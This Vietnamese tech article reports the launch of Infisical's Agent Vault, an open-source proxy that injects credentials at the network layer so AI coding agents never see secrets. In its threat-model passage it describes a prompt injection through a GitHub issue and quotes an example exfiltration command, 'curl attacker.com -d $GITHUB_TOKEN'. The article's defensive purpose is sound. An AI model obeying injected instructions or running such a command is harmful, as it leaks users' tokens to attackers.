- Infisical vừa ra mắt Agent Vault — credential broker open-source cho AI agent.
- Thay vì đưa secret cho agent, nó chặn HTTPS và bơm credential ở lớp network.
- Claude Code, Cursor, Codex dùng được ngay với lệnh `agent-vault run -- claude`.
TL;DR
Ngày 22/04/2026, Tony Dang (co-founder Infisical) công bố Agent Vault — một HTTP credential proxy mã nguồn mở cho AI agent. Ý tưởng gốc: đừng bao giờ đưa secret cho model. Agent gọi API như bình thường, Agent Vault chặn request ở lớp network và bơm credential vào đúng lúc forward lên upstream. Secret không bao giờ chạm vào context của LLM, không bao giờ xuất hiện trong shell history, không bao giờ bị prompt injection lôi ra. Cài một dòng, license MIT, bản v0.9.0 đã tag ngày 21/04/2026.
What's new
Agent Vault không phải là "thêm một secret manager nữa". Infisical gọi model mới này là brokered access, not retrieval. Khác biệt nằm ở chỗ secret đi đâu:
- Secret manager cổ điển (HashiCorp Vault, 1Password, Doppler): agent gọi API vault → nhận secret → dùng secret. Secret có mặt trong memory agent, có thể bị log, bị prompt injection, bị exfil qua tool call.
- Agent Vault: agent chỉ nhận một URL proxy + một CA trust bundle. Khi agent
fetch("https://api.github.com/..."), request đi qua proxy local (port 14322), proxy inject token tương ứng và forward. Agent process không bao giờ thấy token.
Lệnh headline — cũng là câu mở đầu bài tweet công bố — là agent-vault run -- claude. Wrap Claude Code một dòng, từ lúc đó mọi HTTPS call của Claude được route qua vault.
Why it matters
Năm 2026 agentic AI đã qua giai đoạn demo. Claude Code deploy code thật, Cursor mở PR thật, Codex chạy migration thật. Và mỗi agent cần credential thật — GitHub token, Stripe key, DB password, AWS role. Câu hỏi không còn là "agent có xịn không" mà là "khi agent bị prompt-inject bởi một issue lạ trên GitHub, nó có thể làm gì?"
Với mô hình cũ, câu trả lời là: gần như bất cứ thứ gì agent có quyền, vì token nằm ngay trong env. Với Agent Vault, câu trả lời là: không làm gì cả, vì không có token để đọc. Prompt injection có cố bắt agent curl attacker.com -d $GITHUB_TOKEN cũng trả về rỗng.
Technical facts
- Encryption: AES-256-GCM với random DEK cho mỗi credential. Master password tuỳ chọn, wrap DEK bằng Argon2id.
- Ports: TLS transparent proxy ở 14322, HTTP control API ở 14321.
- Audit log: log per-request — method, host, path, status, latency, tên key được dùng. Body, header, query string không log — tránh leak PII ngược.
- Runtime: backend Go 1.25+, frontend TypeScript, đóng gói Docker
infisical/agent-vault. - Install:
curl -fsSL https://get.agent-vault.dev | shrồiagent-vault server -d. - SDK:
@infisical/agent-vault-sdkcho sandboxed agent — mint session ngắn hạn rồi inject proxy env vào container E2B / Docker / Vercel Sandbox. - License: MIT cho core. Enterprise feature (SSO, policy nâng cao, managed host) ở thư mục
ee/, commercial license. - Version: v0.9.0, 14 release, 123 commit trên main khi launch.
Comparison
| Hệ thống | Model | Agent thấy secret? | License |
|---|---|---|---|
| Agent Vault | Transparent HTTPS proxy, inject ở network layer | Không | MIT + ee |
| HashiCorp Vault | Agent fetch short-lived secret qua API | Có | BSL 1.1 |
| 1Password Unified Access | Agent fetch từ vault per-session | Có | Commercial |
| Arcade.dev | OAuth broker per-user per-tool | Có (token scoped) | Commercial SaaS |
Khác biệt cốt lõi: Agent Vault là giải pháp duy nhất mà LLM về mặt vật lý không đọc được credential của chính nó. Mọi giải pháp còn lại đều phải assume agent trung thực.
Use cases
- Coding agent có quyền repo:
agent-vault run -- claudeđể Claude Code push GitHub, deploy Vercel, query Stripe mà không token nào lọt vào shell history hay model context. - Sandboxed autonomous agent: SDK mint session cho container E2B hoặc Vercel Sandbox. Container chạy code không tin cậy nhưng vẫn gọi được Stripe, DB — vì credential nằm ngoài sandbox.
- SaaS đa tenant BYO key: một vault per tenant, agent code chạy generic, proxy layer tự switch credential theo session.
- Audit end-to-end: session trói credential với user người thật. Khi cần trả lời "lúc 3 giờ sáng agent dùng token của user nào?" — có sẵn trong log proxy.
Limitations & pricing
- Core MIT, self-host miễn phí. Managed hosting và enterprise feature cần liên hệ Infisical.
- Chưa tag 1.0 — API có thể thay đổi.
- Agent phải tôn trọng
HTTPS_PROXYenv và CA bundle. Agent pin cert tự hoặc mở raw socket sẽ không route qua vault. - Chỉ cover HTTP/HTTPS. Traffic raw như Postgres wire protocol vẫn cần HashiCorp-style short-lived credential hoặc DB proxy riêng.
What's next
Tony Dang gọi đây là "the next chapter of the agent stack" — hàm ý Infisical đang dịch chuyển từ secrets management cho developer sang security platform cho agent. Hướng đi tiếp theo có thể đoán từ roadmap ngầm trong repo: stabilize 1.0, mở Python SDK, và merge sâu hơn với Agent Sentinel để một control plane duy nhất cover cả MCP tool call lẫn direct HTTP. Nếu bạn đang build coding agent hay autonomous agent có credential thật, agent-vault run -- claude là câu lệnh đáng thử tuần này.
Nguồn: github.com/Infisical/agent-vault, tweet Tony Dang, Infisical Agent Sentinel docs.
